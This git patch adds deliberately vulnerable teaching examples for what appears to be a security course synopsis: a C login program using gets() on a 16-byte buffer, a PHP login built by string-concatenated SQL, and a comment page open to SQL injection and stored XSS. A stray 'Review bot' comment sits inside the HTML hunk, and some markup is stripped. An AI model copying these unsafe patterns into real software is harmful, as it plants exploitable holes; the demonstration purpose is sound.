From ee0bd3f7716546f679bd390d7b681fedf949b2fb Mon Sep 17 00:00:00 2001
From: Marcin Zelent
Date: Wed, 30 May 2018 18:27:51 +0200
Subject: Added buffer overflow example

---
 .DS_Store | Bin 0 -> 8196 bytes
 examples/buffer-overflow/buffer-overflow | Bin 0 -> 8520 bytes
 examples/buffer-overflow/buffer-overflow.c | 18 +++++++++++++++
 examples/sql-injection/index.html | 25 ++++++++++++++++++++
 examples/sql-injection/login.php | 23 ++++++++++++++++++
 examples/sql-injection/users.db | Bin 0 -> 8192 bytes
 examples/xss/comments.db | Bin 0 -> 8192 bytes
 examples/xss/index.php | 36 +++++++++++++++++++++++++++++
 sql-injection/index.html | 25 --------------------
 sql-injection/login.php | 23 ------------------
 sql-injection/users.db | Bin 8192 -> 0 bytes
 synopsis.pdf | Bin 167583 -> 259023 bytes
 synopsis.tex | 26 +++++++++++++++++++++
 xss/comments.db | Bin 8192 -> 0 bytes
 xss/index.php | 36 -----------------------------
 15 files changed, 128 insertions(+), 84 deletions(-)
 create mode 100644 .DS_Store
 create mode 100755 examples/buffer-overflow/buffer-overflow
 create mode 100644 examples/buffer-overflow/buffer-overflow.c
 create mode 100644 examples/sql-injection/index.html
 create mode 100644 examples/sql-injection/login.php
 create mode 100644 examples/sql-injection/users.db
 create mode 100644 examples/xss/comments.db
 create mode 100644 examples/xss/index.php
 delete mode 100644 sql-injection/index.html
 delete mode 100644 sql-injection/login.php
 delete mode 100644 sql-injection/users.db
 delete mode 100644 xss/comments.db
 delete mode 100644 xss/index.php

diff --git a/.DS_Store b/.DS_Store
new file mode 100644
index 0000000..6049920
Binary files /dev/null and b/.DS_Store differ
diff --git a/examples/buffer-overflow/buffer-overflow b/examples/buffer-overflow/buffer-overflow
new file mode 100755
index 0000000..c518559
Binary files /dev/null and b/examples/buffer-overflow/buffer-overflow differ
diff --git a/examples/buffer-overflow/buffer-overflow.c b/examples/buffer-overflow/buffer-overflow.c
new file mode 100644
index 0000000..96f0ee8
--- /dev/null
+++ b/examples/buffer-overflow/buffer-overflow.c
@@ -0,0 +1,18 @@
+#include
+#include
+
+int main(void)
+{
+ char buf[16];
+ int ok = 0;
+
+ printf("Type admin password: \n");
+ gets(buf);
+
+ if (strcmp(buf, "pass123")) printf("\nWrong password!\n");
+ else ok = 1;
+
+ if (ok) printf("\nLogged in as admin.\n");
+
+ return 0;
+}
diff --git a/examples/sql-injection/index.html b/examples/sql-injection/index.html
new file mode 100644
index 0000000..d3e760b
--- /dev/null
+++ b/examples/sql-injection/index.html
@@ -0,0 +1,25 @@ + + + + Login page + + + + +
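Review bot: The `gets(buf)` call into the 16-byte `buf` is the deliberate defect this example exists to show, but nothing in the file marks it, so a reader cannot tell which line is the lesson or what the correct form is; a comment on that line such as `gets(buf); /* DELIBERATE BUG: unbounded read into buf[16]; the safe form is fgets(buf, sizeof buf, stdin) */` would make that explicit. `gets` was removed from the language in C11, so this will not compile with `-std=c11` on current toolchains; a header comment should state the compiler and flags the example is meant to be built with. The two `#include` lines carry no header name in this rendering, presumably `<stdio.h>` and `<string.h>` lost as markup, so it is worth confirming the committed file has them. The same listing is repeated verbatim in the synopsis.tex hunk and should carry the same comment.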

Login

+
+
+
+ +
+ + diff --git a/examples/sql-injection/login.php b/examples/sql-injection/login.php new file mode 100644 index 0000000..826c38c --- /dev/null +++ b/examples/sql-injection/login.php @@ -0,0 +1,23 @@ +open('users.db'); + } + } + + if(isset($_POST['email'], $_POST['pass'])) + { + $email = $_POST['email']; + $pass = $_POST['pass']; + + $db = new MyDB(); + + $sql = 'SELECT * FROM Users WHERE email=\''.$email.'\' AND password=\''.$pass.'\''; + + $ret = $db->query($sql); + while($row = $ret->fetchArray(SQLITE3_ASSOC)) { + echo 'Logged in as '.$row['email'].'
'; + } + $db->close(); + } +?> diff --git a/examples/sql-injection/users.db b/examples/sql-injection/users.db new file mode 100644 index 0000000..9ddf64e Binary files /dev/null and b/examples/sql-injection/users.db differ diff --git a/examples/xss/comments.db b/examples/xss/comments.db new file mode 100644 index 0000000..32114c2 Binary files /dev/null and b/examples/xss/comments.db differ diff --git a/examples/xss/index.php b/examples/xss/index.php new file mode 100644 index 0000000..e645517 --- /dev/null +++ b/examples/xss/index.php @@ -0,0 +1,36 @@ +open('comments.db'); + } + } + + if (isset($_POST['user'], $_POST['comment'])) { + $user = $_POST['user']; + $comment = $_POST['comment']; + + $db = new MyDB(); + + $sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . $comment . '\')'; + $ret = $db->exec($sql); + $db->close(); + } + + echo 'Comments' . + '

Comments

'; + + $db = new MyDB(); + + $sql = 'SELECT * FROM Comments'; + $ret = $db->query($sql); + while ($row = $ret->fetchArray(SQLITE3_ASSOC)) + echo '

' . $row['user'] . ' says:
' . $row['comment'] . '

'; + + $db->close(); + + echo '

Add comment

' . + '
' . + '
' . + '
' . + '
'; +?> diff --git a/sql-injection/index.html b/sql-injection/index.html deleted file mode 100644 index d3e760b..0000000 --- a/sql-injection/index.html +++ /dev/null @@ -1,25 +0,0 @@ - - - - Login page - - - - -

Login

-
-
-
- -
- - diff --git a/sql-injection/login.php b/sql-injection/login.php deleted file mode 100644 index 826c38c..0000000 --- a/sql-injection/login.php +++ /dev/null @@ -1,23 +0,0 @@ -open('users.db'); - } - } - - if(isset($_POST['email'], $_POST['pass'])) - { - $email = $_POST['email']; - $pass = $_POST['pass']; - - $db = new MyDB(); - - $sql = 'SELECT * FROM Users WHERE email=\''.$email.'\' AND password=\''.$pass.'\''; - - $ret = $db->query($sql); - while($row = $ret->fetchArray(SQLITE3_ASSOC)) { - echo 'Logged in as '.$row['email'].'
'; - } - $db->close(); - } -?> diff --git a/sql-injection/users.db b/sql-injection/users.db deleted file mode 100644 index 9ddf64e..0000000 Binary files a/sql-injection/users.db and /dev/null differ diff --git a/synopsis.pdf b/synopsis.pdf index 25d6747..171a21b 100644 Binary files a/synopsis.pdf and b/synopsis.pdf differ diff --git a/synopsis.tex b/synopsis.tex index e844895..9c115c8 100644 --- a/synopsis.tex +++ b/synopsis.tex @@ -740,5 +740,31 @@ INSERT INTO Comments VALUES('attacker','hello '); \end{minted} +\newpage + +\appendix +\section{Buffer overflow example} + +\subsection{buffer-overflow.c} +\begin{minted}{c} +#include +#include + +int main(void) +{ + char buf[16]; + int ok = 0; + + printf("Type admin password: \n"); + gets(buf); + + if (strcmp(buf, "pass123")) printf("\nWrong password!\n"); + else ok = 1; + + if (ok) printf("\nLogged in as admin.\n"); + + return 0; +} +\end{minted} \end{document} diff --git a/xss/comments.db b/xss/comments.db deleted file mode 100644 index 32114c2..0000000 Binary files a/xss/comments.db and /dev/null differ diff --git a/xss/index.php b/xss/index.php deleted file mode 100644 index e645517..0000000 --- a/xss/index.php +++ /dev/null @@ -1,36 +0,0 @@ -open('comments.db'); - } - } - - if (isset($_POST['user'], $_POST['comment'])) { - $user = $_POST['user']; - $comment = $_POST['comment']; - - $db = new MyDB(); - - $sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . $comment . '\')'; - $ret = $db->exec($sql); - $db->close(); - } - - echo 'Comments' . - '

Comments

'; - - $db = new MyDB(); - - $sql = 'SELECT * FROM Comments'; - $ret = $db->query($sql); - while ($row = $ret->fetchArray(SQLITE3_ASSOC)) - echo '

' . $row['user'] . ' says:
' . $row['comment'] . '

'; - - $db->close(); - - echo '

Add comment

' . - '
' . - '
' . - '
' . - '
'; -?> -- cgit v1.2.3